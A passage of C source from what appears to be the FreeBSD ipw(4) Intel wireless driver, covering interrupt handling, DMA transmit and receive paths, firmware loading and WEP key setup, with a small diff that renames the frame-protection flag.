TAILQ_FIRST(&ic->ic_vaps); uint32_t state; bus_dmamap_sync(sc->rxbuf_dmat, sbuf->map, BUS_DMASYNC_POSTREAD); state = le32toh(*mtod(sbuf->m, uint32_t *)); switch (state) { case IPW_STATE_ASSOCIATED: DPRINTFN(2, ("Association succeeded (%s flags 0x%x)\n", IEEESTATE(vap), sc->flags)); /* XXX suppress state change in case the fw auto-associates */ if ((sc->flags & IPW_FLAG_ASSOCIATING) == 0) { DPRINTF(("Unexpected association (%s, flags 0x%x)\n", IEEESTATE(vap), sc->flags)); break; } sc->flags &= ~IPW_FLAG_ASSOCIATING; sc->flags |= IPW_FLAG_ASSOCIATED; break; case IPW_STATE_SCANNING: DPRINTFN(3, ("Scanning (%s flags 0x%x)\n", IEEESTATE(vap), sc->flags)); /* * NB: Check driver state for association on assoc * loss as the firmware will immediately start to * scan and we would treat it as a beacon miss if * we checked the 802.11 layer state. */ if (sc->flags & IPW_FLAG_ASSOCIATED) { IPW_UNLOCK(sc); /* XXX probably need to issue disassoc to fw */ ieee80211_beacon_miss(ic); IPW_LOCK(sc); } break; case IPW_STATE_SCAN_COMPLETE: /* * XXX For some reason scan requests generate scan * started + scan done events before any traffic is * received (e.g. probe response frames). We work * around this by marking the HACK flag and skipping * the first scan complete event. */ DPRINTFN(3, ("Scan complete (%s flags 0x%x)\n", IEEESTATE(vap), sc->flags)); if (sc->flags & IPW_FLAG_HACK) { sc->flags &= ~IPW_FLAG_HACK; break; } if (sc->flags & IPW_FLAG_SCANNING) { IPW_UNLOCK(sc); ieee80211_scan_done(vap); IPW_LOCK(sc); sc->flags &= ~IPW_FLAG_SCANNING; sc->sc_scan_timer = 0; } break; case IPW_STATE_ASSOCIATION_LOST: DPRINTFN(2, ("Association lost (%s flags 0x%x)\n", IEEESTATE(vap), sc->flags)); sc->flags &= ~(IPW_FLAG_ASSOCIATING | IPW_FLAG_ASSOCIATED); if (vap->iv_state == IEEE80211_S_RUN) { IPW_UNLOCK(sc); ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); IPW_LOCK(sc); } break; case IPW_STATE_DISABLED: /* XXX? is this right? */ sc->flags &= ~(IPW_FLAG_HACK | IPW_FLAG_SCANNING | IPW_FLAG_ASSOCIATING | IPW_FLAG_ASSOCIATED); DPRINTFN(2, ("Firmware disabled (%s flags 0x%x)\n", IEEESTATE(vap), sc->flags)); break; case IPW_STATE_RADIO_DISABLED: device_printf(sc->sc_dev, "radio turned off\n"); ieee80211_notify_radio(ic, 0); ipw_stop_locked(sc); /* XXX start polling thread to detect radio on */ break; default: DPRINTFN(2, ("%s: unhandled state %u %s flags 0x%x\n", __func__, state, IEEESTATE(vap), sc->flags)); break; } #undef IEEESTATE } /* * Set driver state for current channel. */ static void ipw_setcurchan(struct ipw_softc *sc, struct ieee80211_channel *chan) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; ic->ic_curchan = chan; ieee80211_radiotap_chan_change(ic); } /* * XXX: Hack to set the current channel to the value advertised in beacons or * probe responses. Only used during AP detection. */ static void ipw_fix_channel(struct ipw_softc *sc, struct mbuf *m) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_channel *c; struct ieee80211_frame *wh; uint8_t subtype; uint8_t *frm, *efrm; wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != IEEE80211_FC0_TYPE_MGT) return; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (subtype != IEEE80211_FC0_SUBTYPE_BEACON && subtype != IEEE80211_FC0_SUBTYPE_PROBE_RESP) return; /* XXX use ieee80211_parse_beacon */ frm = (uint8_t *)(wh + 1); efrm = mtod(m, uint8_t *) + m->m_len; frm += 12; /* skip tstamp, bintval and capinfo fields */ while (frm < efrm) { if (*frm == IEEE80211_ELEMID_DSPARMS) #if IEEE80211_CHAN_MAX < 255 if (frm[2] <= IEEE80211_CHAN_MAX) #endif { DPRINTF(("Fixing channel to %d\n", frm[2])); c = ieee80211_find_channel(ic, ieee80211_ieee2mhz(frm[2], 0), IEEE80211_CHAN_B); if (c == NULL) c = &ic->ic_channels[0]; ipw_setcurchan(sc, c); } frm += frm[1] + 2; } } static void ipw_rx_data_intr(struct ipw_softc *sc, struct ipw_status *status, struct ipw_soft_bd *sbd, struct ipw_soft_buf *sbuf) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mbuf *mnew, *m; struct ieee80211_node *ni; bus_addr_t physaddr; int error; int8_t rssi, nf; DPRINTFN(5, ("received frame len=%u, rssi=%u\n", le32toh(status->len), status->rssi)); if (le32toh(status->len) < sizeof (struct ieee80211_frame_min) || le32toh(status->len) > MCLBYTES) return; /* * Try to allocate a new mbuf for this ring element and load it before * processing the current mbuf. If the ring element cannot be loaded, * drop the received packet and reuse the old mbuf. In the unlikely * case that the old mbuf can't be reloaded either, explicitly panic. */ mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { ifp->if_ierrors++; return; } bus_dmamap_sync(sc->rxbuf_dmat, sbuf->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(sc->rxbuf_dmat, sbuf->map); error = bus_dmamap_load(sc->rxbuf_dmat, sbuf->map, mtod(mnew, void *), MCLBYTES, ipw_dma_map_addr, &physaddr, 0); if (error != 0) { m_freem(mnew); /* try to reload the old mbuf */ error = bus_dmamap_load(sc->rxbuf_dmat, sbuf->map, mtod(sbuf->m, void *), MCLBYTES, ipw_dma_map_addr, &physaddr, 0); if (error != 0) { /* very unlikely that it will fail... */ panic("%s: could not load old rx mbuf", device_get_name(sc->sc_dev)); } ifp->if_ierrors++; return; } /* * New mbuf successfully loaded, update Rx ring and continue * processing. */ m = sbuf->m; sbuf->m = mnew; sbd->bd->physaddr = htole32(physaddr); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = le32toh(status->len); rssi = status->rssi + IPW_RSSI_TO_DBM; nf = -95; if (ieee80211_radiotap_active(ic)) { struct ipw_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; tap->wr_antsignal = rssi; tap->wr_antnoise = nf; } if (sc->flags & IPW_FLAG_SCANNING) ipw_fix_channel(sc, m); IPW_UNLOCK(sc); ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi - nf, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi - nf, nf); IPW_LOCK(sc); bus_dmamap_sync(sc->rbd_dmat, sc->rbd_map, BUS_DMASYNC_PREWRITE); } static void ipw_rx_intr(struct ipw_softc *sc) { struct ipw_status *status; struct ipw_soft_bd *sbd; struct ipw_soft_buf *sbuf; uint32_t r, i; if (!(sc->flags & IPW_FLAG_FW_INITED)) return; r = CSR_READ_4(sc, IPW_CSR_RX_READ); bus_dmamap_sync(sc->status_dmat, sc->status_map, BUS_DMASYNC_POSTREAD); for (i = (sc->rxcur + 1) % IPW_NRBD; i != r; i = (i + 1) % IPW_NRBD) { status = &sc->status_list[i]; sbd = &sc->srbd_list[i]; sbuf = sbd->priv; switch (le16toh(status->code) & 0xf) { case IPW_STATUS_CODE_COMMAND: ipw_rx_cmd_intr(sc, sbuf); break; case IPW_STATUS_CODE_NEWSTATE: ipw_rx_newstate_intr(sc, sbuf); break; case IPW_STATUS_CODE_DATA_802_3: case IPW_STATUS_CODE_DATA_802_11: ipw_rx_data_intr(sc, status, sbd, sbuf); break; case IPW_STATUS_CODE_NOTIFICATION: DPRINTFN(2, ("notification status, len %u flags 0x%x\n", le32toh(status->len), status->flags)); /* XXX maybe drive state machine AUTH->ASSOC? */ break; default: device_printf(sc->sc_dev, "unexpected status code %u\n", le16toh(status->code)); } /* firmware was killed, stop processing received frames */ if (!(sc->flags & IPW_FLAG_FW_INITED)) return; sbd->bd->flags = 0; } bus_dmamap_sync(sc->rbd_dmat, sc->rbd_map, BUS_DMASYNC_PREWRITE); /* kick the firmware */ sc->rxcur = (r == 0) ? IPW_NRBD - 1 : r - 1; CSR_WRITE_4(sc, IPW_CSR_RX_WRITE, sc->rxcur); } static void ipw_release_sbd(struct ipw_softc *sc, struct ipw_soft_bd *sbd) { struct ipw_soft_hdr *shdr; struct ipw_soft_buf *sbuf; switch (sbd->type) { case IPW_SBD_TYPE_COMMAND: bus_dmamap_sync(sc->cmd_dmat, sc->cmd_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->cmd_dmat, sc->cmd_map); break; case IPW_SBD_TYPE_HEADER: shdr = sbd->priv; bus_dmamap_sync(sc->hdr_dmat, shdr->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->hdr_dmat, shdr->map); SLIST_INSERT_HEAD(&sc->free_shdr, shdr, next); break; case IPW_SBD_TYPE_DATA: sbuf = sbd->priv; bus_dmamap_sync(sc->txbuf_dmat, sbuf->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txbuf_dmat, sbuf->map); SLIST_INSERT_HEAD(&sc->free_sbuf, sbuf, next); if (sbuf->m->m_flags & M_TXCB) ieee80211_process_callback(sbuf->ni, sbuf->m, 0/*XXX*/); m_freem(sbuf->m); ieee80211_free_node(sbuf->ni); sc->sc_tx_timer = 0; break; } sbd->type = IPW_SBD_TYPE_NOASSOC; } static void ipw_tx_intr(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ipw_soft_bd *sbd; uint32_t r, i; if (!(sc->flags & IPW_FLAG_FW_INITED)) return; r = CSR_READ_4(sc, IPW_CSR_TX_READ); for (i = (sc->txold + 1) % IPW_NTBD; i != r; i = (i + 1) % IPW_NTBD) { sbd = &sc->stbd_list[i]; if (sbd->type == IPW_SBD_TYPE_DATA) ifp->if_opackets++; ipw_release_sbd(sc, sbd); sc->txfree++; } /* remember what the firmware has processed */ sc->txold = (r == 0) ? IPW_NTBD - 1 : r - 1; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ipw_start_locked(ifp); } static void ipw_fatal_error_intr(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); device_printf(sc->sc_dev, "firmware error\n"); if (vap != NULL) { IPW_UNLOCK(sc); ieee80211_cancel_scan(vap); IPW_LOCK(sc); } ieee80211_runtask(ic, &sc->sc_init_task); } static void ipw_intr(void *arg) { struct ipw_softc *sc = arg; uint32_t r; IPW_LOCK(sc); r = CSR_READ_4(sc, IPW_CSR_INTR); if (r == 0 || r == 0xffffffff) goto done; /* disable interrupts */ CSR_WRITE_4(sc, IPW_CSR_INTR_MASK, 0); /* acknowledge all interrupts */ CSR_WRITE_4(sc, IPW_CSR_INTR, r); if (r & (IPW_INTR_FATAL_ERROR | IPW_INTR_PARITY_ERROR)) { ipw_fatal_error_intr(sc); goto done; } if (r & IPW_INTR_FW_INIT_DONE) wakeup(sc); if (r & IPW_INTR_RX_TRANSFER) ipw_rx_intr(sc); if (r & IPW_INTR_TX_TRANSFER) ipw_tx_intr(sc); /* re-enable interrupts */ CSR_WRITE_4(sc, IPW_CSR_INTR_MASK, IPW_INTR_MASK); done: IPW_UNLOCK(sc); } static void ipw_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nseg, int error) { if (error != 0) return; KASSERT(nseg == 1, ("too many DMA segments, %d should be 1", nseg)); *(bus_addr_t *)arg = segs[0].ds_addr; } static const char * ipw_cmdname(int cmd) { #define N(a) (sizeof(a) / sizeof(a[0])) static const struct { int cmd; const char *name; } cmds[] = { { IPW_CMD_ADD_MULTICAST, "ADD_MULTICAST" }, { IPW_CMD_BROADCAST_SCAN, "BROADCAST_SCAN" }, { IPW_CMD_DISABLE, "DISABLE" }, { IPW_CMD_DISABLE_PHY, "DISABLE_PHY" }, { IPW_CMD_ENABLE, "ENABLE" }, { IPW_CMD_PREPARE_POWER_DOWN, "PREPARE_POWER_DOWN" }, { IPW_CMD_SET_BASIC_TX_RATES, "SET_BASIC_TX_RATES" }, { IPW_CMD_SET_BEACON_INTERVAL, "SET_BEACON_INTERVAL" }, { IPW_CMD_SET_CHANNEL, "SET_CHANNEL" }, { IPW_CMD_SET_CONFIGURATION, "SET_CONFIGURATION" }, { IPW_CMD_SET_DESIRED_BSSID, "SET_DESIRED_BSSID" }, { IPW_CMD_SET_ESSID, "SET_ESSID" }, { IPW_CMD_SET_FRAG_THRESHOLD, "SET_FRAG_THRESHOLD" }, { IPW_CMD_SET_MAC_ADDRESS, "SET_MAC_ADDRESS" }, { IPW_CMD_SET_MANDATORY_BSSID, "SET_MANDATORY_BSSID" }, { IPW_CMD_SET_MODE, "SET_MODE" }, { IPW_CMD_SET_MSDU_TX_RATES, "SET_MSDU_TX_RATES" }, { IPW_CMD_SET_POWER_MODE, "SET_POWER_MODE" }, { IPW_CMD_SET_RTS_THRESHOLD, "SET_RTS_THRESHOLD" }, { IPW_CMD_SET_SCAN_OPTIONS, "SET_SCAN_OPTIONS" }, { IPW_CMD_SET_SECURITY_INFO, "SET_SECURITY_INFO" }, { IPW_CMD_SET_TX_POWER_INDEX, "SET_TX_POWER_INDEX" }, { IPW_CMD_SET_TX_RATES, "SET_TX_RATES" }, { IPW_CMD_SET_WEP_FLAGS, "SET_WEP_FLAGS" }, { IPW_CMD_SET_WEP_KEY, "SET_WEP_KEY" }, { IPW_CMD_SET_WEP_KEY_INDEX, "SET_WEP_KEY_INDEX" }, { IPW_CMD_SET_WPA_IE, "SET_WPA_IE" }, }; static char buf[12]; int i; for (i = 0; i < N(cmds); i++) if (cmds[i].cmd == cmd) return cmds[i].name; snprintf(buf, sizeof(buf), "%u", cmd); return buf; #undef N } /* * Send a command to the firmware and wait for the acknowledgement. */ static int ipw_cmd(struct ipw_softc *sc, uint32_t type, void *data, uint32_t len) { struct ipw_soft_bd *sbd; bus_addr_t physaddr; int error; IPW_LOCK_ASSERT(sc); if (sc->flags & IPW_FLAG_BUSY) { device_printf(sc->sc_dev, "%s: %s not sent, busy\n", __func__, ipw_cmdname(type)); return EAGAIN; } sc->flags |= IPW_FLAG_BUSY; sbd = &sc->stbd_list[sc->txcur]; error = bus_dmamap_load(sc->cmd_dmat, sc->cmd_map, &sc->cmd, sizeof (struct ipw_cmd), ipw_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map command DMA memory\n"); sc->flags &= ~IPW_FLAG_BUSY; return error; } sc->cmd.type = htole32(type); sc->cmd.subtype = 0; sc->cmd.len = htole32(len); sc->cmd.seq = 0; memcpy(sc->cmd.data, data, len); sbd->type = IPW_SBD_TYPE_COMMAND; sbd->bd->physaddr = htole32(physaddr); sbd->bd->len = htole32(sizeof (struct ipw_cmd)); sbd->bd->nfrag = 1; sbd->bd->flags = IPW_BD_FLAG_TX_FRAME_COMMAND | IPW_BD_FLAG_TX_LAST_FRAGMENT; bus_dmamap_sync(sc->cmd_dmat, sc->cmd_map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->tbd_dmat, sc->tbd_map, BUS_DMASYNC_PREWRITE); #ifdef IPW_DEBUG if (ipw_debug >= 4) { printf("sending %s(%u, %u, %u, %u)", ipw_cmdname(type), type, 0, 0, len); /* Print the data buffer in the higher debug level */ if (ipw_debug >= 9 && len > 0) { printf(" data: 0x"); for (int i = 1; i <= len; i++) printf("%1D", (u_char *)data + len - i, ""); } printf("\n"); } #endif /* kick firmware */ sc->txfree--; sc->txcur = (sc->txcur + 1) % IPW_NTBD; CSR_WRITE_4(sc, IPW_CSR_TX_WRITE, sc->txcur); /* wait at most one second for command to complete */ error = msleep(sc, &sc->sc_mtx, 0, "ipwcmd", hz); if (error != 0) { device_printf(sc->sc_dev, "%s: %s failed, timeout (error %u)\n", __func__, ipw_cmdname(type), error); sc->flags &= ~IPW_FLAG_BUSY; return (error); } return (0); } static int ipw_tx_start(struct ifnet *ifp, struct mbuf *m0, struct ieee80211_node *ni) { struct ipw_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_frame *wh; struct ipw_soft_bd *sbd; struct ipw_soft_hdr *shdr; struct ipw_soft_buf *sbuf; struct ieee80211_key *k; struct mbuf *mnew; bus_dma_segment_t segs[IPW_MAX_NSEG]; bus_addr_t physaddr; int nsegs, error, i; wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { struct ipw_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; ieee80211_radiotap_tx(vap, m0); } shdr = SLIST_FIRST(&sc->free_shdr); sbuf = SLIST_FIRST(&sc->free_sbuf); KASSERT(shdr != NULL && sbuf != NULL, ("empty sw hdr/buf pool")); shdr->hdr.type = htole32(IPW_HDR_TYPE_SEND); shdr->hdr.subtype = 0; - shdr->hdr.encrypted = (wh->i_fc[1] & IEEE80211_FC1_WEP) ? 1 : 0; + shdr->hdr.encrypted = (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) ? 1 : 0; shdr->hdr.encrypt = 0; shdr->hdr.keyidx = 0; shdr->hdr.keysz = 0; shdr->hdr.fragmentsz = 0; IEEE80211_ADDR_COPY(shdr->hdr.src_addr, wh->i_addr2); if (ic->ic_opmode == IEEE80211_M_STA) IEEE80211_ADDR_COPY(shdr->hdr.dst_addr, wh->i_addr3); else IEEE80211_ADDR_COPY(shdr->hdr.dst_addr, wh->i_addr1); /* trim IEEE802.11 header */ m_adj(m0, sizeof (struct ieee80211_frame)); error = bus_dmamap_load_mbuf_sg(sc->txbuf_dmat, sbuf->map, m0, segs, &nsegs, 0); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (error != 0) { mnew = m_defrag(m0, M_NOWAIT); if (mnew == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m0); return ENOBUFS; } m0 = mnew; error = bus_dmamap_load_mbuf_sg(sc->txbuf_dmat, sbuf->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } } error = bus_dmamap_load(sc->hdr_dmat, shdr->map, &shdr->hdr, sizeof (struct ipw_hdr), ipw_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map header DMA memory\n"); bus_dmamap_unload(sc->txbuf_dmat, sbuf->map); m_freem(m0); return error; } SLIST_REMOVE_HEAD(&sc->free_sbuf, next); SLIST_REMOVE_HEAD(&sc->free_shdr, next); sbd = &sc->stbd_list[sc->txcur]; sbd->type = IPW_SBD_TYPE_HEADER; sbd->priv = shdr; sbd->bd->physaddr = htole32(physaddr); sbd->bd->len = htole32(sizeof (struct ipw_hdr)); sbd->bd->nfrag = 1 + nsegs; sbd->bd->flags = IPW_BD_FLAG_TX_FRAME_802_3 | IPW_BD_FLAG_TX_NOT_LAST_FRAGMENT; DPRINTFN(5, ("sending tx hdr (%u, %u, %u, %u, %6D, %6D)\n", shdr->hdr.type, shdr->hdr.subtype, shdr->hdr.encrypted, shdr->hdr.encrypt, shdr->hdr.src_addr, ":", shdr->hdr.dst_addr, ":")); sc->txfree--; sc->txcur = (sc->txcur + 1) % IPW_NTBD; sbuf->m = m0; sbuf->ni = ni; for (i = 0; i < nsegs; i++) { sbd = &sc->stbd_list[sc->txcur]; sbd->bd->physaddr = htole32(segs[i].ds_addr); sbd->bd->len = htole32(segs[i].ds_len); sbd->bd->nfrag = 0; sbd->bd->flags = IPW_BD_FLAG_TX_FRAME_802_3; if (i == nsegs - 1) { sbd->type = IPW_SBD_TYPE_DATA; sbd->priv = sbuf; sbd->bd->flags |= IPW_BD_FLAG_TX_LAST_FRAGMENT; } else { sbd->type = IPW_SBD_TYPE_NOASSOC; sbd->bd->flags |= IPW_BD_FLAG_TX_NOT_LAST_FRAGMENT; } DPRINTFN(5, ("sending fragment (%d)\n", i)); sc->txfree--; sc->txcur = (sc->txcur + 1) % IPW_NTBD; } bus_dmamap_sync(sc->hdr_dmat, shdr->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->txbuf_dmat, sbuf->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->tbd_dmat, sc->tbd_map, BUS_DMASYNC_PREWRITE); /* kick firmware */ CSR_WRITE_4(sc, IPW_CSR_TX_WRITE, sc->txcur); return 0; } static int ipw_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { /* no support; just discard */ m_freem(m); ieee80211_free_node(ni); return 0; } static void ipw_start(struct ifnet *ifp) { struct ipw_softc *sc = ifp->if_softc; IPW_LOCK(sc); ipw_start_locked(ifp); IPW_UNLOCK(sc); } static void ipw_start_locked(struct ifnet *ifp) { struct ipw_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; IPW_LOCK_ASSERT(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; if (sc->txfree < 1 + IPW_MAX_NSEG) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (ipw_tx_start(ifp, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } /* start watchdog timer */ sc->sc_tx_timer = 5; } } static void ipw_watchdog(void *arg) { struct ipw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IPW_LOCK_ASSERT(sc); if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); ifp->if_oerrors++; taskqueue_enqueue(taskqueue_swi, &sc->sc_init_task); } } if (sc->sc_scan_timer > 0) { if (--sc->sc_scan_timer == 0) { DPRINTFN(3, ("Scan timeout\n")); /* End the scan */ if (sc->flags & IPW_FLAG_SCANNING) { IPW_UNLOCK(sc); ieee80211_scan_done(TAILQ_FIRST(&ic->ic_vaps)); IPW_LOCK(sc); sc->flags &= ~IPW_FLAG_SCANNING; } } } if (ifp->if_drv_flags & IFF_DRV_RUNNING) callout_reset(&sc->sc_wdtimer, hz, ipw_watchdog, sc); } static int ipw_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ipw_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: IPW_LOCK(sc); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { ipw_init_locked(sc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) ipw_stop_locked(sc); } IPW_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void ipw_stop_master(struct ipw_softc *sc) { uint32_t tmp; int ntries; /* disable interrupts */ CSR_WRITE_4(sc, IPW_CSR_INTR_MASK, 0); CSR_WRITE_4(sc, IPW_CSR_RST, IPW_RST_STOP_MASTER); for (ntries = 0; ntries < 50; ntries++) { if (CSR_READ_4(sc, IPW_CSR_RST) & IPW_RST_MASTER_DISABLED) break; DELAY(10); } if (ntries == 50) device_printf(sc->sc_dev, "timeout waiting for master\n"); tmp = CSR_READ_4(sc, IPW_CSR_RST); CSR_WRITE_4(sc, IPW_CSR_RST, tmp | IPW_RST_PRINCETON_RESET); /* Clear all flags except the following */ sc->flags &= IPW_FLAG_HAS_RADIO_SWITCH; } static int ipw_reset(struct ipw_softc *sc) { uint32_t tmp; int ntries; ipw_stop_master(sc); /* move adapter to D0 state */ tmp = CSR_READ_4(sc, IPW_CSR_CTL); CSR_WRITE_4(sc, IPW_CSR_CTL, tmp | IPW_CTL_INIT); /* wait for clock stabilization */ for (ntries = 0; ntries < 1000; ntries++) { if (CSR_READ_4(sc, IPW_CSR_CTL) & IPW_CTL_CLOCK_READY) break; DELAY(200); } if (ntries == 1000) return EIO; tmp = CSR_READ_4(sc, IPW_CSR_RST); CSR_WRITE_4(sc, IPW_CSR_RST, tmp | IPW_RST_SW_RESET); DELAY(10); tmp = CSR_READ_4(sc, IPW_CSR_CTL); CSR_WRITE_4(sc, IPW_CSR_CTL, tmp | IPW_CTL_INIT); return 0; } static int ipw_waitfordisable(struct ipw_softc *sc, int waitfor) { int ms = hz < 1000 ? 1 : hz/10; int i, error; for (i = 0; i < 100; i++) { if (ipw_read_table1(sc, IPW_INFO_CARD_DISABLED) == waitfor) return 0; error = msleep(sc, &sc->sc_mtx, PCATCH, __func__, ms); if (error == 0 || error != EWOULDBLOCK) return 0; } DPRINTF(("%s: timeout waiting for %s\n", __func__, waitfor ? "disable" : "enable")); return ETIMEDOUT; } static int ipw_enable(struct ipw_softc *sc) { int error; if ((sc->flags & IPW_FLAG_ENABLED) == 0) { DPRINTF(("Enable adapter\n")); error = ipw_cmd(sc, IPW_CMD_ENABLE, NULL, 0); if (error != 0) return error; error = ipw_waitfordisable(sc, 0); if (error != 0) return error; sc->flags |= IPW_FLAG_ENABLED; } return 0; } static int ipw_disable(struct ipw_softc *sc) { int error; if (sc->flags & IPW_FLAG_ENABLED) { DPRINTF(("Disable adapter\n")); error = ipw_cmd(sc, IPW_CMD_DISABLE, NULL, 0); if (error != 0) return error; error = ipw_waitfordisable(sc, 1); if (error != 0) return error; sc->flags &= ~IPW_FLAG_ENABLED; } return 0; } /* * Upload the microcode to the device. */ static int ipw_load_ucode(struct ipw_softc *sc, const char *uc, int size) { int ntries; MEM_WRITE_4(sc, 0x3000e0, 0x80000000); CSR_WRITE_4(sc, IPW_CSR_RST, 0); MEM_WRITE_2(sc, 0x220000, 0x0703); MEM_WRITE_2(sc, 0x220000, 0x0707); MEM_WRITE_1(sc, 0x210014, 0x72); MEM_WRITE_1(sc, 0x210014, 0x72); MEM_WRITE_1(sc, 0x210000, 0x40); MEM_WRITE_1(sc, 0x210000, 0x00); MEM_WRITE_1(sc, 0x210000, 0x40); MEM_WRITE_MULTI_1(sc, 0x210010, uc, size); MEM_WRITE_1(sc, 0x210000, 0x00); MEM_WRITE_1(sc, 0x210000, 0x00); MEM_WRITE_1(sc, 0x210000, 0x80); MEM_WRITE_2(sc, 0x220000, 0x0703); MEM_WRITE_2(sc, 0x220000, 0x0707); MEM_WRITE_1(sc, 0x210014, 0x72); MEM_WRITE_1(sc, 0x210014, 0x72); MEM_WRITE_1(sc, 0x210000, 0x00); MEM_WRITE_1(sc, 0x210000, 0x80); for (ntries = 0; ntries < 10; ntries++) { if (MEM_READ_1(sc, 0x210000) & 1) break; DELAY(10); } if (ntries == 10) { device_printf(sc->sc_dev, "timeout waiting for ucode to initialize\n"); return EIO; } MEM_WRITE_4(sc, 0x3000e0, 0); return 0; } /* set of macros to handle unaligned little endian data in firmware image */ #define GETLE32(p) ((p)[0] | (p)[1] << 8 | (p)[2] << 16 | (p)[3] << 24) #define GETLE16(p) ((p)[0] | (p)[1] << 8) static int ipw_load_firmware(struct ipw_softc *sc, const char *fw, int size) { const uint8_t *p, *end; uint32_t tmp, dst; uint16_t len; int error; p = fw; end = fw + size; while (p < end) { dst = GETLE32(p); p += 4; len = GETLE16(p); p += 2; ipw_write_mem_1(sc, dst, p, len); p += len; } CSR_WRITE_4(sc, IPW_CSR_IO, IPW_IO_GPIO1_ENABLE | IPW_IO_GPIO3_MASK | IPW_IO_LED_OFF); /* enable interrupts */ CSR_WRITE_4(sc, IPW_CSR_INTR_MASK, IPW_INTR_MASK); /* kick the firmware */ CSR_WRITE_4(sc, IPW_CSR_RST, 0); tmp = CSR_READ_4(sc, IPW_CSR_CTL); CSR_WRITE_4(sc, IPW_CSR_CTL, tmp | IPW_CTL_ALLOW_STANDBY); /* wait at most one second for firmware initialization to complete */ if ((error = msleep(sc, &sc->sc_mtx, 0, "ipwinit", hz)) != 0) { device_printf(sc->sc_dev, "timeout waiting for firmware " "initialization to complete\n"); return error; } tmp = CSR_READ_4(sc, IPW_CSR_IO); CSR_WRITE_4(sc, IPW_CSR_IO, tmp | IPW_IO_GPIO1_MASK | IPW_IO_GPIO3_MASK); return 0; } static int ipw_setwepkeys(struct ipw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ipw_wep_key wepkey; struct ieee80211_key *wk; int error, i; for (i = 0; i < IEEE80211_WEP_NKID; i++) { wk = &vap->iv_nw_keys[i]; if (wk->wk_cipher == NULL || wk->wk_cipher->ic_cipher != IEEE80211_CIPHER_WEP) continue; wepkey.idx = i; wepkey.len = wk->wk_keylen; memset(wepkey.key, 0, sizeof wepkey.key); memcpy(wepkey.key, wk->wk_key, wk->wk_keylen); DPRINTF(("Setting wep key index %u len %u\n", wepkey.idx, wepkey.len)); error = ipw_cmd(sc, IPW_CMD_SET_WEP_KEY, &wepkey, sizeof wepkey); if (error != 0) return error; } return 0; } static int ipw_setwpaie(struct ipw_softc *sc, const void *ie, int 